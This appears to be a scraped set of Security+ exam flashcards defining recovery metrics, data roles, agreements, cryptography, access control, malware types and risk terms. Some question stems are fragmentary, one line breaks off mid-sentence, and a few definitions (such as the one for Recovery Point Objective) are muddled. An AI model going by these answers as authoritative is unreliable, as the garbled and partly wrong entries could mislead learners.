exam 3 Flashcards
What is the difference between Mean Time To Restore and Mean Time Between Failures?
MTTR (Mean Time To Restore) is the amount of time required to get back up and running. This is sometimes called Mean Time To Repair.
MTBF (Mean Time Between Failures) is a prediction of how long the system will be operational before a failure occurs
What is the difference between Recovery Point Objective and Recovery Time Objective?
An RPO (Recovery Point Objective) is a qualifier that determines when the system is recovered. A recovered system may not be completely repaired, but it will be running well enough to maintain a certain level of
operation.
An RTO (Recovery Time Objective) is the service level goal to work towards when recovering a system and getting back up and running.
What is the difference between a Processor, Owner, Controller, and Custodian?
A data processor performs some type of action to the data, and this is often a different group within the organization or a third-party company.
In this example, the third-party financial organization is the data processor of the employee’s financial data.
The incorrect answers:
B. Owner
The data owner is often an executive of the company and is ultimately responsible for the use and security of this data.
C. Controller
A data controller manages the data. In this example, the human resources team would control the access and use of the employee data.
D. Custodian
A data custodian is responsible for the accuracy, privacy, and security of the data. Many organizations will hire data custodians to ensure all data is properly protected and maintained.
Sam would like to send an email to Jack and have Jack verify that Sam was the sender of the email. Which of these should Sam use to provide this verification?
Digitally sign with Sam’s private key The sender of a message digitally signs with their own private key to
ensure integrity, authentication, and non-repudiation of the signed contents. The digital signature is validated with the sender’s public key.
Data hashing
Data hashing creates a unique message digest based on stored data. If the data is tampered with, a hash taken after the change will differ from the original value. This allows the forensic engineer to identify if information
has been changed. would allow a future analyst
to verify the data as original and unaltered?
Web filters
Web filters contain a large database of categorized website addresses, and this allows an administrator to create rules to block browsing attempts to specific content. For example, a content filter may allow browsing to news and business sites, but block browsing attempts to gaming and shopping sites.
❍ A. Service level agreement
❍ B. Memorandum of understanding
❍ C. Non-disclosure agreement
❍ D. Acceptable use policy
A service level agreement (SLA) is used to contractually define the minimum terms for services. In this example, the medical imaging company would require an SLA from the network provider for the necessary throughput and uptime metrics.
The incorrect answers:
B. Memorandum of understanding
A memorandum of understanding (MOU) is an informal letter of intent. The MOU is not a signed contract, and there are no contractual obligations associated with the content of an MOU.
C. Non-disclosure agreement
A non-disclosure agreement (NDA) is used between entities to prevent the use and dissemination of confidential information.
D. Acceptable use policy
An acceptable use policy (AUP) commonly details the rules of behavior for employees using an organization’s network and computing resources.
A. SLA
❍ B. SOW
❍ C. NDA
❍ D. BPA
A SOW (Statement of Work) is a detailed list of tasks, items, or processes to be completed by a third-party. The SOW lists the job scope, location, deliverables, and any other specifics associated with the agreement. The
SOW is also used as a checklist to verify the job was completed properly by the service provider.
The incorrect answers:
An SLA (Service Level Agreement) sets the minimum terms of service between a customer and a service provider. This agreement often contains
terms for expected uptime, response time requirements, and other minimum service levels required by the customer.
An NDA (Non-Disclosure Agreement) is a confidentiality agreement between parties. The agreement is designed to protect information such as trade secrets, business activities, or anything else included in the NDA. An
NDA does not generally contain an itemized list of service requests.
A BPA (Business Partners Agreement) is used between entities going into business together. A list of itemized service requests would not be part of a BPA.
SD-WAN
An SD-WAN (Software Defined Networking in a Wide Area Network) network allows users to efficiently communicate directly to cloud-based applications.
Diffie-Hellman
The Diffie-Hellman algorithm can combine public and private keys to derive the same session key. This allows two devices to create and use this shared session key without sending the key across the network.
When verifying the legitimacy of a website, you check its digital certificate to ensure a secure connection. Which cryptographic method is used to bind the certificate to a trusted issuer, like a certificate authority?
Digital signatures are essential for digital certificates. A certificate authority (CA) acts like a trusted third party, cryptographically signing the certificate using their own digital signature. This signature verifies the certificate’s authenticity and allows you to confirm it originates from a legitimate CA.
Data custodian
Data custodian is the most fitting choice. They are responsible for the day-to-day care, control, access, and security of the customer data within the database. This includes managing access rights to ensure only authorized personnel can view or modify the data.
data processor
Data processor performs specific tasks on the data as instructed by the data owner. They wouldn’t typically manage access rights themselves.
Logic Bombs
Logic bomb is malware programmed to detonate and cause damage upon meeting a specific trigger condition. It might explain sudden system issues, but the description doesn’t indicate a specific trigger being met (e.g., date or event).
Worm
Worm is a self-replicating malicious program that spreads across networks. While it could cause performance issues, it wouldn’t necessarily explain the pop-up messages or cursor movement.
Residual risk
This is the correct term for risks that remain after implementing control measures.
Transferred risk
This refers to risks that have been shifted to a third party, such as through insurance.
Penetration test
A pen test simulates a real-world attack by ethical hackers who attempt to exploit vulnerabilities in the system. This proactive approach helps identify security weaknesses before attackers can discover them. In this scenario, the isolated test environment provides a safe space for pen testers to probe the system for vulnerabilities without impacting production systems.
Vulnerability scanner
Vulnerability scanners are automated tools that can identify known vulnerabilities in systems. They’re a good starting point, but they might miss zero-day vulnerabilities or those requiring human expertise to exploit.
Risk tolerance
This represents the level of risk an organization is willing to accept. By understanding the organization’s risk tolerance, the manager can determine the appropriate level of resources to allocate for risk mitigation.
SED
Self encrypting drives: Encrypts data directly on the laptop’s hard drive, making it unreadable even if the device is lost or stolen. This is critical for field laptops where physical security might be a challenge.
A security team discovered a previously patched vulnerability reappearing on servers after a recent update. What security practice can help prevent similar issues in the future?
Master image is a reference image used to deploy consistent server configurations. While helpful for maintaining consistency, it wouldn’t necessarily prevent a patch from reintroducing a vulnerability unless the master image itself is updated with the latest secure patches.
Continuous monitoring
Continuous monitoring involves ongoing security checks and scans to identify potential vulnerabilities and threats in systems. By continuously monitoring for vulnerabilities, the security team could have detected the reintroduced issue before it caused problems. This allows for quicker response and patching to prevent exploitation.
EPP
Endpoint Protection Platform (EPP): EPP focuses on protecting individual devices rather than the overall data flow between on-premises and cloud environments.
Cloud Access Security Broker (CASB)
A CASB is specifically designed to secure cloud applications by acting as a gatekeeper between the on-premises environment and the cloud. It provides visibility and control over data flow, enabling organizations to enforce security policies and protect sensitive information.
Maintaining the baseline
This involves making ongoing adjustments and updates to the baseline to ensure it remains effective and up-to-date.
Establishing the baseline
This is the initial creation of the baseline.
DLP
Data loss prevention (DLP): This technology monitors and controls data movement across network boundaries, preventing sensitive information from being copied to unauthorized devices like USB drives.
EDR
Endpoint detection and response (EDR): Focuses on detecting and responding to threats on endpoint devices, not preventing data leakage.
TLS
TLS (Transport Layer Security): When configured with appropriate cipher suites, TLS can provide perfect forward secrecy, meaning that the compromise of long-term keys does not compromise the security of past communication sessions.
Quantitative risk assessment
his method uses numerical data and statistical analysis to assign monetary values to risks.
Qualitative risk assessment
This type of assessment relies on subjective judgments and expert opinions to prioritize risks based on their potential impact and likelihood, without assigning specific monetary values.
AUP
Acceptable Use Policy (AUP): An AUP specifically outlines the rules and expectations for using company IT resources, ensuring employees understand what is permitted and prohibited.
cipher
This is a cryptographic algorithm used to encrypt data, making it unreadable to anyone without the correct decryption key. This ensures that only the intended recipient can access the sensitive information.
Elliptic curve cryptography
This is a modern and efficient asymmetric encryption algorithm well-suited for mobile devices due to its performance advantages and strong security properties.
Hashing
Hashing is a one-way function used for data integrity verification, not encryption.
Credential replay
This attack involves capturing and reusing valid authentication credentials, exactly as described in the scenario. The attacker is replaying a previously captured login session to gain unauthorized access.
DAC
Discretionary access control (DAC) This allows users to share access to their own data, which is less restrictive and doesn’t meet the requirement for mandatory control over data sensitivity.
MAC
Mandatory access control (MAC) enforces strict access controls based on security labels assigned to both data and users. It prevents unauthorized access to sensitive information by enforcing a clear separation of duties.
ESP
Encapsulating Security Payload (ESP) provides comprehensive protection for IPsec tunnels, including data encryption, authentication, and integrity checks. It ensures confidentiality, preventing unauthorized access to the data, and protects against data tampering.
IaC
Infrastructure as Code (IaC): This approach treats infrastructure resources like servers, networks, and storage as code, allowing them to be managed and provisioned using scripts and automation tools. This improves efficiency, reduces errors, and enables consistent configurations.
IaaS
Provides computing resources like servers and storage, but doesn’t address automation of infrastructure provisioning.
EKU
Extended Key Usage (EKU) specifies the intended purpose of the certificate, such as client authentication, email protection, or code signing. It does not relate to multiple domain coverage. EKU is also not within the scope of the Security+ exam and not covered in the objectives. This type of question requires you to know what is and isn’t within the exam objectives.
AAA
Authentication, authorization, and accounting
Failover clustering
This solution involves multiple servers working together, with one acting as the primary server and the other as a standby. If the primary server fails, the standby server automatically takes over, ensuring uninterrupted service.
CASB
Cloud Access Security Broker (CASB) provides visibility and control over cloud services and data, including the ability to monitor data transfers, detect threats, and enforce data encryption policies. It acts as a gatekeeper between the on-premises environment and the cloud, ensuring data security.
XSS
Cross-site scripting (XSS) this is the correct answer as it involves the injection of malicious script into a trusted website, which is then executed by the user’s browser. This is exactly the scenario described in the prompt.
Cloud Access Security Broker (CASB)
A CASB is specifically designed to secure cloud applications by acting as a gatekeeper between the on-premises environment and the cloud. It provides visibility and control over data flow, enabling organizations to enforce security policies and protect sensitive information.
Right to be forgotten
This is the correct term for an individual’s right to request the deletion of their personal data.
Right to data access
Grants individuals the right to access their personal data held by an organization.
Right to data portability
Allows individuals to transfer their personal data between different organizations.
PDU
Power distribution unit (PDU): This device provides power outlets and often includes monitoring capabilities for power consumption, enabling remote management and control.
Sensitive
Employee salary information is typically considered sensitive and should be protected from unauthorized disclosure.
Public
This classification is for information that can be freely shared without restrictions.
Playbook
This is a step-by-step guide for handling specific incidents, providing clear procedures for security teams to follow.
Automation
Automating compliance processes can help streamline tasks, reduce human error, and ensure that tasks are completed consistently. This is especially beneficial for large companies with extensive obligations, as it improves both accuracy and efficiency.
Corrective control
This type of control helps mitigate the impact of a security incident after it has occurred.
Compensating control
This type of control is implemented when a primary control (like the existing security measures) might not be fully effective. The backup and restore process acts as a secondary layer of protection to mitigate the impact of a successful attack.
A company is considering implementing asymmetric encryption to protect sensitive data. Which use case would best leverage the strengths of asymmetric encryption?
Authenticating users
PFS
Perfect forward secrecy: This cryptographic mechanism ensures that the compromise of a session key does not compromise the security of previous or future communications.
Preventive
A locked door prevents unauthorized access to the server room, acting as a proactive security measure.
S/MIME
S/MIME is a standard used for encrypting and signing emails, providing confidentiality, integrity, authentication, and non-repudiation. It’s commonly used in legal and business communications to securely exchange sensitive information, ensuring the recipient is authenticated, and the contents remain confidential and unaltered.
SCAP
Security Content Automation Protocol (SCAP): A framework for specifying and communicating security data, but doesn’t provide a standardized scoring system for vulnerabilities.
Perfect forward secrecy
This cryptographic concept involves generating unique session keys for each communication session, ensuring that the compromise of long-term keys does not compromise the security of past communications.
MTTR
Mean time to repair (MTTR): This metric measures the average time it takes to restore a system to full operation after a failure. In this case, the MTTR is 20 minutes.
A company is developing a new e-commerce platform to process credit card payments securely. Which cryptographic algorithm is commonly used for encrypting data in transit and for digital signatures in this context?
RSA – This is an asymmetric encryption algorithm that uses a pair of keys, a public key and a private key. It’s widely used in e-commerce for secure data transmission (SSL/TLS) and digital signatures, providing authentication and data integrity.
Risk mitigation
This is the correct answer. It involves taking proactive steps to reduce the impact or probability of a risk occurring. This might include implementing security controls, such as firewalls, intrusion detection systems, or employee training.